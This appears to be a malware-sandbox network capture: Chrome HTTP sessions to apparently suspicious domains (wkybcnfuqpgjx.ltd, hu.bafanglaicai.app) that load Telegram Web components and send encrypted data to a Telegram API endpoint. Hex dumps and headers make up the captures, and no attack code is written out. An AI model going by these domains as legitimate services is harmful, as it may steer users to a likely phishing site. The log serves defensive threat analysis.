                                  Connection: close
                                  Last-Modified: Thu, 28 Nov 2024 10:06:39 GMT
                                  Vary: Accept-Encoding
                                  ETag: W/"674840af-10037"
                                  Cache-Control: max-age=14400
                                  CF-Cache-Status: REVALIDATED
                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9fuSER%2BSZatH4rpVcF7GjEHpAegsTs35%2FkbPxNs0Zp3wATwnShJ1qdxwsDpknH5ttV7Vj3beJZhok6CUHpU6TWVbyPpowIbGKZpfTBBsjI7B%2BlJmNo5EkFDmqUtTcsJJ3M2OPg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                  Server: cloudflare
                                  CF-RAY: 9008e2c96f097d08-EWR
                                  alt-svc: h3=":443"; ma=86400
                                  server-timing: cfL4;desc="?proto=TCP&rtt=1789&min_rtt=1789&rtt_var=894&sent=6&recv=7&lost=0&retrans=1&sent_bytes=4226&recv_bytes=1030&delivery_rate=129066&cwnd=177&unsent_bytes=0&cid=03e5b6d3b3258b4a&ts=819&x=0"
                                  2025-01-12 00:03:52 UTC449INData Raw: 37 63 64 64 0d 0a 76 61 72 20 6b 65 79 2c 4d 6f 64 75 6c 65 3d 76 6f 69 64 20 30 21 3d 3d 4d 6f 64 75 6c 65 3f 4d 6f 64 75 6c 65 3a 7b 7d 2c 6d 6f 64 75 6c 65 4f 76 65 72 72 69 64 65 73 3d 7b 7d 3b 66 6f 72 28 6b 65 79 20 69 6e 20 4d 6f 64 75 6c 65 29 4d 6f 64 75 6c 65 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 28 6b 65 79 29 26 26 28 6d 6f 64 75 6c 65 4f 76 65 72 72 69 64 65 73 5b 6b 65 79 5d 3d 4d 6f 64 75 6c 65 5b 6b 65 79 5d 29 3b 76 61 72 20 61 72 67 75 6d 65 6e 74 73 5f 3d 5b 5d 2c 74 68 69 73 50 72 6f 67 72 61 6d 3d 22 2e 2f 74 68 69 73 2e 70 72 6f 67 72 61 6d 22 2c 71 75 69 74 5f 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 72 29 7b 74 68 72 6f 77 20 72 7d 2c 45 4e 56 49 52 4f 4e 4d 45 4e 54 5f 49 53 5f 57 45 42 3d 21 31 2c 45 4e 56 49 52 4f 4e 4d 45 4e
                                  Data Ascii: 7cddvar key,Module=void 0!==Module?Module:{},moduleOverrides={};for(key in Module)Module.hasOwnProperty(key)&&(moduleOverrides[key]=Module[key]);var arguments_=[],thisProgram="./this.program",quit_=function(e,r){throw r},ENVIRONMENT_IS_WEB=!1,ENVIRONMEN
                                  2025-01-12 00:03:52 UTC1369INData Raw: 6f 66 20 70 72 6f 63 65 73 73 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 70 72 6f 63 65 73 73 2e 76 65 72 73 69 6f 6e 73 26 26 22 73 74 72 69 6e 67 22 3d 3d 74 79 70 65 6f 66 20 70 72 6f 63 65 73 73 2e 76 65 72 73 69 6f 6e 73 2e 6e 6f 64 65 2c 45 4e 56 49 52 4f 4e 4d 45 4e 54 5f 49 53 5f 53 48 45 4c 4c 3d 21 45 4e 56 49 52 4f 4e 4d 45 4e 54 5f 49 53 5f 57 45 42 26 26 21 45 4e 56 49 52 4f 4e 4d 45 4e 54 5f 49 53 5f 4e 4f 44 45 26 26 21 45 4e 56 49 52 4f 4e 4d 45 4e 54 5f 49 53 5f 57 4f 52 4b 45 52 3b 76 61 72 20 72 65 61 64 5f 2c 72 65 61 64 41 73 79 6e 63 2c 72 65 61 64 42 69 6e 61 72 79 2c 73 65 74 57 69 6e 64 6f 77 54 69 74 6c 65 2c 6e 6f 64 65 46 53 2c 6e 6f 64 65 50 61 74 68 2c 73 63 72 69 70 74 44 69 72 65 63 74 6f 72 79 3d 22 22 3b 66
                                  Data Ascii: of process&&"object"==typeof process.versions&&"string"==typeof process.versions.node,ENVIRONMENT_IS_SHELL=!ENVIRONMENT_IS_WEB&&!ENVIRONMENT_IS_NODE&&!ENVIRONMENT_IS_WORKER;var read_,readAsync,readBinary,setWindowTitle,nodeFS,nodePath,scriptDirectory="";f
                                  2025-01-12 00:03:52 UTC1369INData Raw: 73 3f 61 72 67 75 6d 65 6e 74 73 5f 3d 73 63 72 69 70 74 41 72 67 73 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 61 72 67 75 6d 65 6e 74 73 26 26 28 61 72 67 75 6d 65 6e 74 73 5f 3d 61 72 67 75 6d 65 6e 74 73 29 2c 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 71 75 69 74 26 26 28 71 75 69 74 5f 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 71 75 69 74 28 65 29 7d 29 2c 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 70 72 69 6e 74 26 26 28 22 75 6e 64 65 66 69 6e 65 64 22 3d 3d 74 79 70 65 6f 66 20 63 6f 6e 73 6f 6c 65 26 26 28 63 6f 6e 73 6f 6c 65 3d 7b 7d 29 2c 63 6f 6e 73 6f 6c 65 2e 6c 6f 67 3d 70 72 69 6e 74 2c 63 6f 6e 73 6f 6c 65 2e 77 61 72 6e 3d 63 6f 6e 73 6f 6c 65 2e 65 72 72 6f 72 3d 22 75 6e 64 65 66 69 6e
                                  Data Ascii: s?arguments_=scriptArgs:"undefined"!=typeof arguments&&(arguments_=arguments),"function"==typeof quit&&(quit_=function(e){quit(e)}),"undefined"!=typeof print&&("undefined"==typeof console&&(console={}),console.log=print,console.warn=console.error="undefin
                                  2025-01-12 00:03:52 UTC1369INData Raw: 20 48 45 41 50 33 32 5b 44 59 4e 41 4d 49 43 54 4f 50 5f 50 54 52 3e 3e 32 5d 3d 74 2c 72 7d 66 75 6e 63 74 69 6f 6e 20 67 65 74 4e 61 74 69 76 65 54 79 70 65 53 69 7a 65 28 65 29 7b 73 77 69 74 63 68 28 65 29 7b 63 61 73 65 22 69 31 22 3a 63 61 73 65 22 69 38 22 3a 72 65 74 75 72 6e 20 31 3b 63 61 73 65 22 69 31 36 22 3a 72 65 74 75 72 6e 20 32 3b 63 61 73 65 22 69 33 32 22 3a 63 61 73 65 22 66 6c 6f 61 74 22 3a 72 65 74 75 72 6e 20 34 3b 63 61 73 65 22 69 36 34 22 3a 63 61 73 65 22 64 6f 75 62 6c 65 22 3a 72 65 74 75 72 6e 20 38 3b 64 65 66 61 75 6c 74 3a 69 66 28 22 2a 22 3d 3d 3d 65 5b 65 2e 6c 65 6e 67 74 68 2d 31 5d 29 72 65 74 75 72 6e 20 34 3b 69 66 28 22 69 22 3d 3d 3d 65 5b 30 5d 29 7b 76 61 72 20 72 3d 4e 75 6d 62 65 72 28 65 2e 73 75 62 73 74
                                  Data Ascii: HEAP32[DYNAMICTOP_PTR>>2]=t,r}function getNativeTypeSize(e){switch(e){case"i1":case"i8":return 1;case"i16":return 2;case"i32":case"float":return 4;case"i64":case"double":return 8;default:if("*"===e[e.length-1])return 4;if("i"===e[0]){var r=Number(e.subst
                                  2025-01-12 00:03:52 UTC1369INData Raw: 76 61 72 20 77 61 73 6d 54 61 62 6c 65 3d 6e 65 77 20 57 65 62 41 73 73 65 6d 62 6c 79 2e 54 61 62 6c 65 28 7b 69 6e 69 74 69 61 6c 3a 35 32 32 2c 6d 61 78 69 6d 75 6d 3a 35 32 32 2c 65 6c 65 6d 65 6e 74 3a 22 61 6e 79 66 75 6e 63 22 7d 29 2c 41 42 4f 52 54 3d 21 31 2c 45 58 49 54 53 54 41 54 55 53 3d 30 3b 66 75 6e 63 74 69 6f 6e 20 61 73 73 65 72 74 28 65 2c 72 29 7b 65 7c 7c 61 62 6f 72 74 28 22 41 73 73 65 72 74 69 6f 6e 20 66 61 69 6c 65 64 3a 20 22 2b 72 29 7d 66 75 6e 63 74 69 6f 6e 20 67 65 74 43 46 75 6e 63 28 65 29 7b 76 61 72 20 72 3d 4d 6f 64 75 6c 65 5b 22 5f 22 2b 65 5d 3b 72 65 74 75 72 6e 20 61 73 73 65 72 74 28 72 2c 22 43 61 6e 6e 6f 74 20 63 61 6c 6c 20 75 6e 6b 6e 6f 77 6e 20 66 75 6e 63 74 69 6f 6e 20 22 2b 65 2b 22 2c 20 6d 61 6b 65
                                  Data Ascii: var wasmTable=new WebAssembly.Table({initial:522,maximum:522,element:"anyfunc"}),ABORT=!1,EXITSTATUS=0;function assert(e,r){e||abort("Assertion failed: "+r)}function getCFunc(e){var r=Module["_"+e];return assert(r,"Cannot call unknown function "+e+", make
                                  2025-01-12 00:03:52 UTC1369INData Raw: 3b 30 21 3d 3d 28 6c 3d 73 7c 7c 72 5b 66 5d 29 3f 28 22 69 36 34 22 3d 3d 6c 26 26 28 6c 3d 22 69 33 32 22 29 2c 73 65 74 56 61 6c 75 65 28 69 2b 66 2c 6d 2c 6c 29 2c 64 21 3d 3d 6c 26 26 28 63 3d 67 65 74 4e 61 74 69 76 65 54 79 70 65 53 69 7a 65 28 6c 29 2c 64 3d 6c 29 2c 66 2b 3d 63 29 3a 66 2b 2b 7d 72 65 74 75 72 6e 20 69 7d 76 61 72 20 55 54 46 38 44 65 63 6f 64 65 72 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 54 65 78 74 44 65 63 6f 64 65 72 3f 6e 65 77 20 54 65 78 74 44 65 63 6f 64 65 72 28 22 75 74 66 38 22 29 3a 76 6f 69 64 20 30 3b 66 75 6e 63 74 69 6f 6e 20 55 54 46 38 41 72 72 61 79 54 6f 53 74 72 69 6e 67 28 65 2c 72 2c 74 29 7b 66 6f 72 28 76 61 72 20 6e 3d 72 2b 74 2c 6f 3d 72 3b 65 5b 6f 5d 26 26 21 28 6f 3e 3d 6e 29
                                  Data Ascii: ;0!==(l=s||r[f])?("i64"==l&&(l="i32"),setValue(i+f,m,l),d!==l&&(c=getNativeTypeSize(l),d=l),f+=c):f++}return i}var UTF8Decoder="undefined"!=typeof TextDecoder?new TextDecoder("utf8"):void 0;function UTF8ArrayToString(e,r,t){for(var n=r+t,o=r;e[o]&&!(o>=n)
                                  2025-01-12 00:03:52 UTC1369INData Raw: 68 61 72 43 6f 64 65 41 74 28 74 29 3b 6e 3e 3d 35 35 32 39 36 26 26 6e 3c 3d 35 37 33 34 33 26 26 28 6e 3d 36 35 35 33 36 2b 28 28 31 30 32 33 26 6e 29 3c 3c 31 30 29 7c 31 30 32 33 26 65 2e 63 68 61 72 43 6f 64 65 41 74 28 2b 2b 74 29 29 2c 6e 3c 3d 31 32 37 3f 2b 2b 72 3a 72 2b 3d 6e 3c 3d 32 30 34 37 3f 32 3a 6e 3c 3d 36 35 35 33 35 3f 33 3a 34 7d 72 65 74 75 72 6e 20 72 7d 66 75 6e 63 74 69 6f 6e 20 77 72 69 74 65 41 72 72 61 79 54 6f 4d 65 6d 6f 72 79 28 65 2c 72 29 7b 48 45 41 50 38 2e 73 65 74 28 65 2c 72 29 7d 66 75 6e 63 74 69 6f 6e 20 77 72 69 74 65 41 73 63 69 69 54 6f 4d 65 6d 6f 72 79 28 65 2c 72 2c 74 29 7b 66 6f 72 28 76 61 72 20 6e 3d 30 3b 6e 3c 65 2e 6c 65 6e 67 74 68 3b 2b 2b 6e 29 48 45 41 50 38 5b 30 7c 72 2b 2b 5d 3d 65 2e 63 68 61
                                  Data Ascii: harCodeAt(t);n>=55296&&n<=57343&&(n=65536+((1023&n)<<10)|1023&e.charCodeAt(++t)),n<=127?++r:r+=n<=2047?2:n<=65535?3:4}return r}function writeArrayToMemory(e,r){HEAP8.set(e,r)}function writeAsciiToMemory(e,r,t){for(var n=0;n<e.length;++n)HEAP8[0|r++]=e.cha
                                  2025-01-12 00:03:52 UTC1369INData Raw: 41 6e 64 56 69 65 77 73 28 62 75 66 66 65 72 29 2c 48 45 41 50 33 32 5b 44 59 4e 41 4d 49 43 54 4f 50 5f 50 54 52 3e 3e 32 5d 3d 44 59 4e 41 4d 49 43 5f 42 41 53 45 3b 76 61 72 20 5f 5f 41 54 50 52 45 52 55 4e 5f 5f 3d 5b 5d 2c 5f 5f 41 54 49 4e 49 54 5f 5f 3d 5b 5d 2c 5f 5f 41 54 4d 41 49 4e 5f 5f 3d 5b 5d 2c 5f 5f 41 54 50 4f 53 54 52 55 4e 5f 5f 3d 5b 5d 2c 72 75 6e 74 69 6d 65 49 6e 69 74 69 61 6c 69 7a 65 64 3d 21 31 3b 66 75 6e 63 74 69 6f 6e 20 70 72 65 52 75 6e 28 29 7b 69 66 28 4d 6f 64 75 6c 65 2e 70 72 65 52 75 6e 29 66 6f 72 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 4d 6f 64 75 6c 65 2e 70 72 65 52 75 6e 26 26 28 4d 6f 64 75 6c 65 2e 70 72 65 52 75 6e 3d 5b 4d 6f 64 75 6c 65 2e 70 72 65 52 75 6e 5d 29 3b 4d 6f 64 75 6c 65 2e
                                  Data Ascii: AndViews(buffer),HEAP32[DYNAMICTOP_PTR>>2]=DYNAMIC_BASE;var __ATPRERUN__=[],__ATINIT__=[],__ATMAIN__=[],__ATPOSTRUN__=[],runtimeInitialized=!1;function preRun(){if(Module.preRun)for("function"==typeof Module.preRun&&(Module.preRun=[Module.preRun]);Module.
                                  2025-01-12 00:03:52 UTC1369INData Raw: 65 72 76 61 6c 28 72 75 6e 44 65 70 65 6e 64 65 6e 63 79 57 61 74 63 68 65 72 29 2c 72 75 6e 44 65 70 65 6e 64 65 6e 63 79 57 61 74 63 68 65 72 3d 6e 75 6c 6c 29 2c 64 65 70 65 6e 64 65 6e 63 69 65 73 46 75 6c 66 69 6c 6c 65 64 29 29 7b 76 61 72 20 72 3d 64 65 70 65 6e 64 65 6e 63 69 65 73 46 75 6c 66 69 6c 6c 65 64 3b 64 65 70 65 6e 64 65 6e 63 69 65 73 46 75 6c 66 69 6c 6c 65 64 3d 6e 75 6c 6c 2c 72 28 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 61 62 6f 72 74 28 65 29 7b 74 68 72 6f 77 20 4d 6f 64 75 6c 65 2e 6f 6e 41 62 6f 72 74 26 26 4d 6f 64 75 6c 65 2e 6f 6e 41 62 6f 72 74 28 65 29 2c 6f 75 74 28 65 2b 3d 22 22 29 2c 65 72 72 28 65 29 2c 41 42 4f 52 54 3d 21 30 2c 45 58 49 54 53 54 41 54 55 53 3d 31 2c 65 3d 22 61 62 6f 72 74 28 22 2b 65 2b 22 29 2e 20 42
                                  Data Ascii: erval(runDependencyWatcher),runDependencyWatcher=null),dependenciesFulfilled)){var r=dependenciesFulfilled;dependenciesFulfilled=null,r()}}function abort(e){throw Module.onAbort&&Module.onAbort(e),out(e+=""),err(e),ABORT=!0,EXITSTATUS=1,e="abort("+e+"). B
                                  2025-01-12 00:03:52 UTC1369INData Raw: 74 69 6f 6e 20 72 28 65 2c 72 29 7b 76 61 72 20 74 3d 65 2e 65 78 70 6f 72 74 73 3b 4d 6f 64 75 6c 65 2e 61 73 6d 3d 74 2c 72 65 6d 6f 76 65 52 75 6e 44 65 70 65 6e 64 65 6e 63 79 28 22 77 61 73 6d 2d 69 6e 73 74 61 6e 74 69 61 74 65 22 29 7d 66 75 6e 63 74 69 6f 6e 20 74 28 65 29 7b 72 28 65 2e 69 6e 73 74 61 6e 63 65 29 7d 66 75 6e 63 74 69 6f 6e 20 6e 28 72 29 7b 72 65 74 75 72 6e 20 67 65 74 42 69 6e 61 72 79 50 72 6f 6d 69 73 65 28 29 2e 74 68 65 6e 28 28 66 75 6e 63 74 69 6f 6e 28 72 29 7b 72 65 74 75 72 6e 20 57 65 62 41 73 73 65 6d 62 6c 79 2e 69 6e 73 74 61 6e 74 69 61 74 65 28 72 2c 65 29 7d 29 29 2e 74 68 65 6e 28 72 2c 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 72 72 28 22 66 61 69 6c 65 64 20 74 6f 20 61 73 79 6e 63 68 72 6f 6e 6f 75 73 6c 79
                                  Data Ascii: tion r(e,r){var t=e.exports;Module.asm=t,removeRunDependency("wasm-instantiate")}function t(e){r(e.instance)}function n(r){return getBinaryPromise().then((function(r){return WebAssembly.instantiate(r,e)})).then(r,(function(e){err("failed to asynchronously


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  53192.168.2.64989635.190.80.14432644C:\Program Files\Google\Chrome\Application\chrome.exe
                                  TimestampBytes transferredDirectionData
                                  2025-01-12 00:03:52 UTC554OUTOPTIONS /report/v4?s=%2F%2BX7FWk81LDOT34xUgcuOMWwnzaX8wTb%2F9QNP1p7JHLKt%2FxM%2FpgRdKuoSYXULY%2F9dmMkC1lxEb4Sxgl6zdhykoqyv%2FcrIpgdXSZMWGDeRDodc%2B%2BWOYQBVdSyUgnwAZad1fjpuily HTTP/1.1
                                  Host: a.nel.cloudflare.com
                                  Connection: keep-alive
                                  Origin: https://hu.bafanglaicai.app
                                  Access-Control-Request-Method: POST
                                  Access-Control-Request-Headers: content-type
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                  Accept-Encoding: gzip, deflate, br
                                  Accept-Language: en-US,en;q=0.9
                                  2025-01-12 00:03:52 UTC336INHTTP/1.1 200 OK
                                  Content-Length: 0
                                  access-control-max-age: 86400
                                  access-control-allow-methods: POST, OPTIONS
                                  access-control-allow-origin: *
                                  access-control-allow-headers: content-length, content-type
                                  date: Sun, 12 Jan 2025 00:03:52 GMT
                                  Via: 1.1 google
                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                  Connection: close


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  54192.168.2.649894149.154.167.994432644C:\Program Files\Google\Chrome\Application\chrome.exe
                                  TimestampBytes transferredDirectionData
                                  2025-01-12 00:03:52 UTC350OUTGET /apiw1 HTTP/1.1
                                  Host: zws2.web.telegram.org
                                  Connection: keep-alive
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                  Accept: */*
                                  Sec-Fetch-Site: none
                                  Sec-Fetch-Mode: cors
                                  Sec-Fetch-Dest: empty
                                  Accept-Encoding: gzip, deflate, br
                                  Accept-Language: en-US,en;q=0.9
                                  2025-01-12 00:03:52 UTC312INHTTP/1.1 404 Not Found
                                  Server: nginx/1.18.0
                                  Date: Sun, 12 Jan 2025 00:03:52 GMT
                                  Content-Type: text/html
                                  Content-Length: 169
                                  Connection: close
                                  Access-Control-Allow-Origin: *
                                  Access-Control-Allow-Methods: POST, OPTIONS
                                  Access-Control-Allow-Headers: origin, content-type
                                  Access-Control-Max-Age: 1728000
                                  2025-01-12 00:03:52 UTC169INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 30 2e 33 2e 33 33 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                  Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/0.3.33</center></body></html>


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  55192.168.2.649895149.154.167.994432644C:\Program Files\Google\Chrome\Application\chrome.exe
                                  TimestampBytes transferredDirectionData
                                  2025-01-12 00:03:52 UTC450OUTPOST /apiw1 HTTP/1.1
                                  Host: zws2.web.telegram.org
                                  Connection: keep-alive
                                  Content-Length: 396
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                  Accept: */*
                                  Origin: https://wkybcnfuqpgjx.ltd
                                  Sec-Fetch-Site: cross-site
                                  Sec-Fetch-Mode: cors
                                  Sec-Fetch-Dest: empty
                                  Referer: https://wkybcnfuqpgjx.ltd/
                                  Accept-Encoding: gzip, deflate, br
                                  Accept-Language: en-US,en;q=0.9
                                  2025-01-12 00:03:52 UTC396OUTData Raw: 00 00 00 00 00 00 00 00 9c 10 ec 2f e7 06 83 67 78 01 00 00 1f 5f 04 f5 f3 81 d8 6c 57 89 9e 85 b2 99 4f 3c 7b 63 cb b7 df 4a 5d 82 ac a3 e2 40 08 5d 89 46 a5 06 7b 2a fe 50 01 00 6f 9f e6 e0 af 73 6c a7 e1 05 96 02 2d c2 d1 7e 34 91 3b 15 ba 9c 39 b2 f6 53 d2 f9 65 7d d0 25 f3 e4 e5 cc 84 a2 63 86 89 fc d5 dd 0e 73 a9 2d ce fa 94 ce 2c 81 e9 ae 4c dd 70 5d 34 b8 8f b6 01 28 4b 6e ac 9c 56 93 c3 be 07 c9 69 f4 24 6f 98 38 49 7a 3d ba 07 30 d1 99 1f a5 23 7d 64 9e 36 1c 8e 50 18 2b d4 ae a8 f6 24 7b a6 8f 2c 31 4f a9 ed 08 fd 28 9d e9 0f 0a 3b 87 e5 5e ef f8 4b 01 7c c6 1c 9d 24 fa 32 b1 a4 9b db 8b 5b 3f e9 9e ce 5a c4 89 a9 ee 72 a3 ff e2 d9 11 08 c5 c7 be d2 eb 73 5a 4b 7d 7a e9 88 0d e4 8c c7 79 c0 80 c1 76 be 91 23 6f ac f2 3d 12 29 fe 36 b7 06 9a cb
                                  Data Ascii: /gx_lWO<{cJ]@]F{*Posl-~4;9Se}%cs-,Lp]4(KnVi$o8Iz=0#}d6P+${,1O(;^K|$2[?ZrsZK}zyv#o=)6
                                  2025-01-12 00:03:53 UTC407INHTTP/1.1 200 OK
                                  Server: nginx/1.18.0
                                  Date: Sun, 12 Jan 2025 00:03:53 GMT
                                  Content-Type: application/octet-stream
                                  Content-Length: 72
                                  Connection: close
                                  Pragma: no-cache
                                  Cache-control: no-store
                                  Access-Control-Allow-Origin: *
                                  Access-Control-Allow-Methods: POST, OPTIONS
                                  Access-Control-Allow-Headers: origin, content-type
                                  Access-Control-Max-Age: 1728000
                                  Strict-Transport-Security: max-age=35768000
                                  2025-01-12 00:03:53 UTC72INData Raw: 00 00 00 00 00 00 00 00 01 70 86 23 e9 06 83 67 34 00 00 00 34 f7 cb 3b f3 81 d8 6c 57 89 9e 85 b2 99 4f 3c 7b 63 cb b7 df 4a 5d 82 ac a3 e2 40 08 5d 89 46 a5 06 7b 2a 45 d7 61 54 f9 f0 82 82 74 1c 1c 1a 03 69 da ce
                                  Data Ascii: p#g44;lWO<{cJ]@]F{*EaTti


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  56192.168.2.64990235.190.80.14432644C:\Program Files\Google\Chrome\Application\chrome.exe
                                  TimestampBytes transferredDirectionData
                                  2025-01-12 00:03:52 UTC492OUTPOST /report/v4?s=%2F%2BX7FWk81LDOT34xUgcuOMWwnzaX8wTb%2F9QNP1p7JHLKt%2FxM%2FpgRdKuoSYXULY%2F9dmMkC1lxEb4Sxgl6zdhykoqyv%2FcrIpgdXSZMWGDeRDodc%2B%2BWOYQBVdSyUgnwAZad1fjpuily HTTP/1.1
                                  Host: a.nel.cloudflare.com
                                  Connection: keep-alive
                                  Content-Length: 398
                                  Content-Type: application/reports+json
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                  Accept-Encoding: gzip, deflate, br
                                  Accept-Language: en-US,en;q=0.9
                                  2025-01-12 00:03:52 UTC398OUTData Raw: 5b 7b 22 61 67 65 22 3a 30 2c 22 62 6f 64 79 22 3a 7b 22 65 6c 61 70 73 65 64 5f 74 69 6d 65 22 3a 31 37 35 33 2c 22 6d 65 74 68 6f 64 22 3a 22 47 45 54 22 2c 22 70 68 61 73 65 22 3a 22 61 70 70 6c 69 63 61 74 69 6f 6e 22 2c 22 70 72 6f 74 6f 63 6f 6c 22 3a 22 68 74 74 70 2f 31 2e 31 22 2c 22 72 65 66 65 72 72 65 72 22 3a 22 22 2c 22 73 61 6d 70 6c 69 6e 67 5f 66 72 61 63 74 69 6f 6e 22 3a 31 2e 30 2c 22 73 65 72 76 65 72 5f 69 70 22 3a 22 31 37 32 2e 36 37 2e 31 35 39 2e 36 33 22 2c 22 73 74 61 74 75 73 5f 63 6f 64 65 22 3a 34 30 35 2c 22 74 79 70 65 22 3a 22 68 74 74 70 2e 65 72 72 6f 72 22 7d 2c 22 74 79 70 65 22 3a 22 6e 65 74 77 6f 72 6b 2d 65 72 72 6f 72 22 2c 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 68 75 2e 62 61 66 61 6e 67 6c 61 69 63 61 69
                                  Data Ascii: [{"age":0,"body":{"elapsed_time":1753,"method":"GET","phase":"application","protocol":"http/1.1","referrer":"","sampling_fraction":1.0,"server_ip":"172.67.159.63","status_code":405,"type":"http.error"},"type":"network-error","url":"https://hu.bafanglaicai
                                  2025-01-12 00:03:53 UTC168INHTTP/1.1 200 OK
                                  Content-Length: 0
                                  date: Sun, 12 Jan 2025 00:03:52 GMT
                                  Via: 1.1 google
                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                  Connection: close


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  57192.168.2.649904172.67.137.414432644C:\Program Files\Google\Chrome\Application\chrome.exe
                                  TimestampBytes transferredDirectionData
                                  2025-01-12 00:03:53 UTC430OUTGET /rlottie-wasm.wasm HTTP/1.1
                                  Host: wkybcnfuqpgjx.ltd
                                  Connection: keep-alive
                                  Accept: */*
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                  Sec-Fetch-Site: same-origin
                                  Sec-Fetch-Mode: cors
                                  Sec-Fetch-Dest: empty
                                  Referer: https://wkybcnfuqpgjx.ltd/2976.4e6e9b1254ce313f06c5.js
                                  Accept-Encoding: gzip, deflate, br
                                  Accept-Language: en-US,en;q=0.9
                                  2025-01-12 00:03:54 UTC868INHTTP/1.1 200 OK
                                  Date: Sun, 12 Jan 2025 00:03:54 GMT
                                  Content-Type: application/wasm
                                  Content-Length: 317584
                                  Connection: close
                                  Last-Modified: Thu, 28 Nov 2024 10:06:40 GMT
                                  ETag: "674840b0-4d890"
                                  Accept-Ranges: bytes
                                  cf-cache-status: DYNAMIC
                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jg0qTyphfrRNJdHFZVEJaYwVRdQliuZmYP3Esr0vZQnIgPiFi6JHpIJqxdrpfaiCdzrXRt3EFoClpuXSm3Ac31eB4kkCWdiEkb84u94ZtBD8XeSPIGfyh0013srbTGoe6BNzOg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                  Server: cloudflare
                                  CF-RAY: 9008e2d54f3d0cac-EWR
                                  alt-svc: h3=":443"; ma=86400
                                  server-timing: cfL4;desc="?proto=TCP&rtt=1550&min_rtt=1550&rtt_var=581&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2843&recv_bytes=1008&delivery_rate=1883870&cwnd=234&unsent_bytes=0&cid=7b17c3f395e61ae7&ts=637&x=0"
                                  2025-01-12 00:03:54 UTC501INData Raw: 00 61 73 6d 01 00 00 00 01 d0 05 5f 60 02 7f 7f 00 60 01 7f 01 7f 60 01 7f 00 60 02 7f 7f 01 7f 60 03 7f 7f 7f 00 60 03 7f 7f 7f 01 7f 60 04 7f 7f 7f 7f 00 60 05 7f 7f 7f 7f 7f 01 7f 60 04 7f 7f 7f 7f 01 7f 60 06 7f 7f 7f 7f 7f 7f 01 7f 60 05 7f 7f 7f 7f 7f 00 60 06 7f 7f 7f 7f 7f 7f 00 60 00 00 60 02 7f 7f 01 7d 60 08 7f 7f 7f 7f 7f 7f 7f 7f 01 7f 60 00 01 7f 60 07 7f 7f 7f 7f 7f 7f 7f 01 7f 60 01 7f 01 7d 60 04 7f 7f 7f 7d 00 60 05 7f 7f 7f 7d 7f 00 60 02 7d 7d 01 7d 60 05 7f 7e 7e 7e 7e 00 60 02 7f 7d 00 60 07 7f 7f 7f 7f 7f 7f 7f 00 60 02 7f 7e 00 60 01 7d 01 7f 60 02 7f 7d 01 7d 60 01 7d 01 7d 60 0a 7f 7f 7f 7f 7f 7f 7f 7f 7f 7f 00 60 03 7f 7f 7d 00 60 03 7f 7d 7d 00 60 05 7f 7f 7f 7f 7e 01 7f 60 04 7f 7f 7f 7f 01 7e 60 02 7c 7f 01 7c 60 05 7f 7f 7e
                                  Data Ascii: asm_``````````````}````}`}`}`}}}`~~~~`}``~`}`}}`}}``}`}}`~`~`||`~
